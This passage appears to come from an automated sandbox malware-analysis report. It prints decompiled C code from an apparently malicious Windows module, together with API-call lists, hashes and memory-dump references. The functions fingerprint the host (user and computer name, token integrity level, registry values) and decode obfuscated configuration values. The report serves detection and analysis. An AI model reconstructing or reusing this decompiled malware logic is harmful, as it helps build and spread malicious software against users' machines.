						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x309a290, _t84, 0x43);
							__eflags = _t42;
							 *0x309a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x309a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x309a2d4; // 0x3ccd5a8
								_t19 = _t76 + 0x309b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x30992a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E03094454( ~_v8 &  *0x309a2c8, 0x309a00c); // executed
								_t84 = E03092206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E03091376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E03092022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E03092439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x309a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E03096BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































    0x030953f2
    0x030953fd
    0x03095400
    0x03095403
    0x03095406
    0x0309540d
    0x0309540f
    0x0309541b
    0x0309541d
    0x0309541d
    0x03095426
    0x0309542e
    0x03095431
    0x0309544b
    0x03095450
    0x03095451
    0x03095453
    0x03095458
    0x0309545d
    0x0309545f
    0x03095466
    0x03095470
    0x03095476
    0x03095483
    0x0309548a
    0x0309548f
    0x0309548f
    0x03095498
    0x030954c1
    0x030954c4
    0x030954d1
    0x030954d8
    0x030954e4
    0x030954e6
    0x030954e8
    0x030954ed
    0x030954f3
    0x030954f9
    0x030954ff
    0x03095502
    0x03095507
    0x0309550f
    0x03095511
    0x03095511
    0x03095514
    0x03095514
    0x0309551a
    0x0309551f
    0x03095527
    0x0309552c
    0x03095531
    0x03095533
    0x03095538
    0x03095567
    0x0309553a
    0x0309553f
    0x03095544
    0x03095549
    0x03095550
    0x03095556
    0x0309555b
    0x03095561
    0x03095561
    0x03095568
    0x0309556a
    0x03095579
    0x0309557f
    0x03095581
    0x03095586
    0x030955b2
    0x03095588
    0x03095588
    0x0309558e
    0x0309559b
    0x030955a1
    0x030955a1
    0x030955a9
    0x030955ab
    0x030955b3
    0x030955b5
    0x030955bc
    0x030955c9
    0x030955d3
    0x030955d5
    0x030955d7
    0x00000000
    0x00000000
    0x030955d9
    0x030955de
    0x030955e0
    0x030955e7
    0x030955eb
    0x030955ee
    0x03095603
    0x03095607
    0x0309560c
    0x00000000
    0x0309560c
    0x030955f0
    0x030955f2
    0x00000000
    0x00000000
    0x030955f4
    0x030955fd
    0x030955ff
    0x03095601
    0x00000000
    0x00000000
    0x00000000
    0x03095601
    0x030955e4
    0x030955e4
    0x030955b5
    0x0309549a
    0x0309549a
    0x0309549f
    0x0309560e
    0x03095612
    0x0309561a
    0x0309561a
    0x00000000
    0x03095612
    0x030954a5
    0x030954a8
    0x030954a8
    0x030954aa
    0x030954ad
    0x030954b5
    0x030954bc
    0x00000000
    0x03095622
    0x03095622
    0x03095625
    0x0309562a
    0x0309562a

    APIs
      • Part of subcall function 030958F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0309540B,00000000,00000000,00000000,?,?,?,?,?,03096BD8,?,00000001), ref: 03095907
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0309A2FC,00000000), ref: 03095476
    • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,03096BD8,?,00000001), ref: 0309548F
    • wsprintfA.USER32 ref: 0309550F
    • memset.NTDLL ref: 0309553F
    • RtlInitializeCriticalSection.NTDLL(06D695F0), ref: 03095550
    • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 03095579
    • wsprintfA.USER32 ref: 030955A9
      • Part of subcall function 03094454: GetUserNameW.ADVAPI32(00000000,030955CE), ref: 0309448B
      • Part of subcall function 03094454: RtlAllocateHeap.NTDLL(00000000,030955CE), ref: 030944A2
      • Part of subcall function 03094454: GetUserNameW.ADVAPI32(00000000,030955CE), ref: 030944AF
      • Part of subcall function 03094454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,030955CE,?,?,?,?,?,03096BD8,?,00000001), ref: 030944D0
      • Part of subcall function 03094454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 030944F7
      • Part of subcall function 03094454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0309450B
      • Part of subcall function 03094454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 03094518
      • Part of subcall function 03094454: HeapFree.KERNEL32(00000000,00000000), ref: 03094536
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
    • String ID:
    • API String ID: 2910951584-0
    • Opcode ID: 4782bed7724296fa6230e600dd475f13ad5c54baf1605b83b1679daac38594b9
    • Instruction ID: c611fff25cad26c13e060893cc82bd9b77013f4bcffd01d3ddb1a48e6aa7a2e2
    • Opcode Fuzzy Hash: 4782bed7724296fa6230e600dd475f13ad5c54baf1605b83b1679daac38594b9
    • Instruction Fuzzy Hash: 5751E571A03215AFFF52EB6ADC44BAEB3F8BB45710F054157E804EB184D779D940ABA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0309113D, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0309113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x309a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E03096837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E030950CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









    0x0309114a
    0x03091151
    0x03091158
    0x0309116c
    0x03091177
    0x0309118f
    0x0309119c
    0x0309119f
    0x030911a4
    0x030911af
    0x030911b3
    0x030911c2
    0x030911c6
    0x030911e2
    0x030911e2
    0x030911e6
    0x030911e6
    0x030911eb
    0x030911ef
    0x030911f5
    0x030911f6
    0x030911fd
    0x03091203

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0309116F
    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0309118F
    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0309119F
    • CloseHandle.KERNEL32(00000000), ref: 030911EF
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 030911C2
    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 030911CA
    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 030911DA
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
    • String ID:
    • API String ID: 1295030180-0
    • Opcode ID: 536d684677ec947e5835fb93c80ff4d7180a9b6a1e08f00bf8f46485f4689d9a
    • Instruction ID: 6a0a036e869b1c07cf616ca78ce4da86f42e28a398b6fe1940d67a3fa39dcef2
    • Opcode Fuzzy Hash: 536d684677ec947e5835fb93c80ff4d7180a9b6a1e08f00bf8f46485f4689d9a
    • Instruction Fuzzy Hash: EB216A75A0120DFFEF11EF94DC84EEEBBB8FB49304F1040A6E910A6291D7758A54EB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03091AB8, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 94memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E03091AB8(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E03094C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x309a2d4; // 0x3ccd5a8
				_t4 = _t24 + 0x309bd60; // 0x6d69308
				_t5 = _t24 + 0x309bd08; // 0x4f0053
				_t45 = E03095384( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x309a124(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x309a2d4; // 0x3ccd5a8
						_t11 = _t32 + 0x309bd54; // 0x6d692fc
						_t48 = _t11;
						_t12 = _t32 + 0x309bd08; // 0x4f0053
						_t52 = E03095D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x309a2d4; // 0x3ccd5a8
							_t13 = _t35 + 0x309bd9e; // 0x30314549
							if(E030974B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x309a2b4 - 6;
								if( *0x309a2b4 <= 6) {
									_t42 =  *0x309a2d4; // 0x3ccd5a8
									_t15 = _t42 + 0x309bbaa; // 0x52384549
									E030974B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x309a2d4; // 0x3ccd5a8
							_t17 = _t38 + 0x309bd98; // 0x6d69340
							_t18 = _t38 + 0x309bd70; // 0x680043
							_t45 = E03091F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x309a290, 0, _t52);
						}
					}
					HeapFree( *0x309a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E03093C84(_t54);
				}
				return _t45;
			}

















    0x03091ab8
    0x03091ac8
    0x03091acb
    0x03091ad2
    0x03091ad4
    0x03091ad4
    0x03091ad7
    0x03091adc
    0x03091ae3
    0x03091af5
    0x03091af9
    0x03091b07
    0x03091b15
    0x03091b19
    0x03091baa
    0x03091baa
    0x03091b1f
    0x03091b1f
    0x03091b24
    0x03091b24
    0x03091b2b
    0x03091b37
    0x03091b39
    0x03091b3b
    0x03091b3d
    0x03091b44
    0x03091b56
    0x03091b58
    0x03091b5f
    0x03091b61
    0x03091b68
    0x03091b73
    0x03091b73
    0x03091b5f
    0x03091b78
    0x03091b7d
    0x03091b84
    0x03091ba2
    0x03091ba4
    0x03091ba4
    0x03091b3b
    0x03091bb6
    0x03091bb6
    0x03091bb8
    0x03091bbd
    0x03091bbf
    0x03091bbf
    0x03091bca

    APIs
    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06D69340,?,00000000,30314549,00000014,004F0053,06D692FC), ref: 03091BA4
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030920B0), ref: 03091BB6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: FreeHeap
    • String ID: Uxt
    • API String ID: 3298025750-1536154274
    • Opcode ID: 55399d1b5d0a825cbed38463e154b7e85ac475d9552179f475f03b5fe469059b
    • Instruction ID: 7bee1670049f66517f61f8843bcdd6f852aa2b7b62d85b1682e0b3e352abd298
    • Opcode Fuzzy Hash: 55399d1b5d0a825cbed38463e154b7e85ac475d9552179f475f03b5fe469059b
    • Instruction Fuzzy Hash: 4231BE36B0320ABFEF11EB94DD84EDE7BFDEB84700F040167A504AB055E2759A05EB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030971A5, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E030971A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x309a2d4; // 0x3ccd5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x309ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E03093875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x309a2d4; // 0x3ccd5a8
					_t5 = _t19 + 0x309ba8c; // 0x6e0049
					_t34 = E03093875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E030950CA(_t34);
					}
					E030950CA(_t31);
				}
				return _v8;
			}













    0x030971ab
    0x030971b0
    0x030971b5
    0x030971bc
    0x030971c8
    0x030971cc
    0x030971ce
    0x030971d4
    0x030971e0
    0x030971e4
    0x030971f7
    0x030971ff
    0x03097213
    0x0309721b
    0x0309721d
    0x0309721d
    0x03097224
    0x03097224
    0x0309722b
    0x0309722b
    0x03097231
    0x03097236
    0x0309723c

    APIs
      • Part of subcall function 03093875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,030971C8,004F0053,00000000,?), ref: 0309387E
      • Part of subcall function 03093875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,030971C8,004F0053,00000000,?), ref: 030938A8
      • Part of subcall function 03093875: memset.NTDLL ref: 030938BC
    • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 030971F7
    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 03097213
    • RegCloseKey.ADVAPI32(00000000), ref: 03097224
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: CloseOpenQueryValuelstrlenmemcpymemset
    • String ID:
    • API String ID: 830012212-0
    • Opcode ID: 3385580890903dbe72bfd1374133c8d938ac590e2f7ca2dd4af55b47fb42a865
    • Instruction ID: d0dc29b2b34f43750a3a81f2d2d800addfae93407d3f95dcdf835f012e2ba442
    • Opcode Fuzzy Hash: 3385580890903dbe72bfd1374133c8d938ac590e2f7ca2dd4af55b47fb42a865
    • Instruction Fuzzy Hash: 29113C76611209BBEB11EBD4DC85FAEB7FCBB84700F1401A6B601AB041EB74D604AB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095685, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x309a294) == 0) {
						E03095076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x309a294) == 1) {
						_t10 = E03096B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







    0x0309568c
    0x0309568d
    0x03095690
    0x030956c2
    0x030956c4
    0x030956c4
    0x03095692
    0x03095693
    0x030956a8
    0x030956af
    0x030956b1
    0x030956b1
    0x030956af
    0x03095693
    0x030956cc

    APIs
    • InterlockedIncrement.KERNEL32(0309A294), ref: 0309569A
      • Part of subcall function 03096B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 03096B24
    • InterlockedDecrement.KERNEL32(0309A294), ref: 030956BA
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Interlocked$CreateDecrementHeapIncrement
    • String ID:
    • API String ID: 3834848776-0
    • Opcode ID: 7a4be1bd14d2d1a43c416dbac027bf19d26a58e756be66eed08373b70b892270
    • Instruction ID: def225bd486462d287d67fd9bc9afe616c44bbc9d288478c2336ee6d0a674c6a
    • Opcode Fuzzy Hash: 7a4be1bd14d2d1a43c416dbac027bf19d26a58e756be66eed08373b70b892270
    • Instruction Fuzzy Hash: A3E048393073215BFF73E766DD0479E96946B83B40F058417A6D1D6028D615D450F6D1
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 03092206, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204memoryCOMMONCrypto
    Download Yara Rule
    C-Code - Quality: 94%
    			E03092206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x309a2d0; // 0x63699bc3
				if(E03091BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x309a324 = _v8;
				}
				_t31 =  *0x309a2d0; // 0x63699bc3
				if(E03091BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x309a2d0; // 0x63699bc3
				if(E03091BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x309a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x309a2d0; // 0x63699bc3
						_t43 = E030938CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x309a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x309a2d0; // 0x63699bc3
						_t44 = E030938CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x309a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x309a2d0; // 0x63699bc3
						_t45 = E030938CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x309a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x309a2d0; // 0x63699bc3
						_t46 = E030938CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x309a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x309a2d0; // 0x63699bc3
						_t47 = E030938CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x309a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x309a2d0; // 0x63699bc3
						_t48 = E030938CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E03093E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E030950DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x309a2d0; // 0x63699bc3
						_t49 = E030938CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E03093E49(0, _t49) != 0) {
						_t102 =  *0x309a37c; // 0x6d69630
						E030910DD(_t102 + 4, _t54);
					}
					_t50 =  *0x309a2d4; // 0x3ccd5a8
					_t20 = _t50 + 0x309b252; // 0x6d687fa
					_t21 = _t50 + 0x309b7b5; // 0x6976612e
					 *0x309a320 = _t20;
					 *0x309a390 = _t21;
					HeapFree( *0x309a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}





























    0x03092206
    0x03092209
    0x03092229
    0x03092237
    0x03092237
    0x0309223c
    0x03092256
    0x0309242a
    0x03092431
    0x03092438
    0x03092438
    0x0309225c
    0x03092278
    0x03092418
    0x03092422
    0x00000000
    0x0309227e
    0x0309227e
    0x03092283
    0x03092299
    0x03092285
    0x03092285
    0x03092292
    0x03092292
    0x030922a3
    0x030922a5
    0x030922af
    0x030922b4
    0x030922b4
    0x030922af
    0x030922bb
    0x030922d1
    0x030922bd
    0x030922bd
    0x030922ca
    0x030922ca
    0x030922d5
    0x030922d7
    0x030922e1
    0x030922e6
    0x030922e6
    0x030922e1
    0x030922ed
    0x03092303
    0x030922ef
    0x030922ef
    0x030922fc
    0x030922fc
    0x03092307
    0x03092309
    0x03092313
    0x03092318
    0x03092318
    0x03092313
    0x0309231f
    0x03092335
    0x03092321
    0x03092321
    0x0309232e
    0x0309232e
    0x03092339
    0x0309233b
    0x03092345
    0x0309234a
    0x0309234a
    0x03092345
    0x03092351
    0x03092367
    0x03092353
    0x03092353
    0x03092360
    0x03092360
    0x0309236b
    0x0309236d
    0x03092377
    0x0309237c
    0x0309237c
    0x03092377
    0x03092383
    0x03092399
    0x03092385
    0x03092385
    0x03092392
    0x03092392
    0x0309239d
    0x0309239f
    0x030923a2
    0x030923a3
    0x030923aa
    0x030923ac
    0x030923ad
    0x030923ad
    0x030923aa
    0x030923b4
    0x030923ca
    0x030923b6
    0x030923b6
    0x030923c3
    0x030923c3
    0x030923ce
    0x030923dc
    0x030923e6
    0x030923e6
    0x030923eb
    0x030923f1
    0x030923fe
    0x03092404
    0x0309240a
    0x0309240f
    0x03092415
    0x00000000
    0x03092415

    APIs
    • StrToIntExA.SHLWAPI(00000000,00000000,030955D3,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 030922AB
    • StrToIntExA.SHLWAPI(00000000,00000000,030955D3,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 030922DD
    • StrToIntExA.SHLWAPI(00000000,00000000,030955D3,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 0309230F
    • StrToIntExA.SHLWAPI(00000000,00000000,030955D3,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 03092341
    • StrToIntExA.SHLWAPI(00000000,00000000,030955D3,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 03092373
    • HeapFree.KERNEL32(00000000,?,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 0309240F
    • HeapFree.KERNEL32(00000000,?,?,030955D3,63699BC3,?,?,63699BC3,030955D3,?,63699BC3,E8FA7DD7,0309A00C,770CC740), ref: 03092422
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: FreeHeap
    • String ID: Uxt
    • API String ID: 3298025750-1536154274
    • Opcode ID: 42977a775c5b9cc738591daed6ea1d9838c2bd68908dd4858bcc4810ddc7322d
    • Instruction ID: bb503518e56368e285d54bf7f2666e5b1c18591e1e2bc0c9d1334cf9a49381ee
    • Opcode Fuzzy Hash: 42977a775c5b9cc738591daed6ea1d9838c2bd68908dd4858bcc4810ddc7322d
    • Instruction Fuzzy Hash: E5618374B06208BBEF51EBB9DD88C9FB7EDBB8C700B184D57A401DB144EA35D940AB64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03094C1B, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E03094C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x309a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x309a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x309a2b0 = _t6;
				 *0x309a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x309a2ac = _t7;
				if(_t7 == 0) {
					 *0x309a2ac =  *0x309a2ac | 0xffffffff;
				}
				return 0;
			}








    0x03094c23
    0x03094c2b
    0x03094c30
    0x00000000
    0x03094c7d
    0x03094c32
    0x03094c3a
    0x03094c7a
    0x00000000
    0x03094c7a
    0x03094c3c
    0x03094c41
    0x03094c53
    0x03094c58
    0x03094c5e
    0x03094c66
    0x03094c6b
    0x03094c6d
    0x03094c6d
    0x00000000

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03096B4E,?,?,00000001), ref: 03094C23
    • GetVersion.KERNEL32(?,00000001), ref: 03094C32
    • GetCurrentProcessId.KERNEL32(?,00000001), ref: 03094C41
    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 03094C5E
    • GetLastError.KERNEL32(?,00000001), ref: 03094C7D
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
    • String ID:
    • API String ID: 2270775618-0
    • Opcode ID: 0a748a7ce164e67ee473836113b32f598ead1c02143be68165a9c1474dd4268a
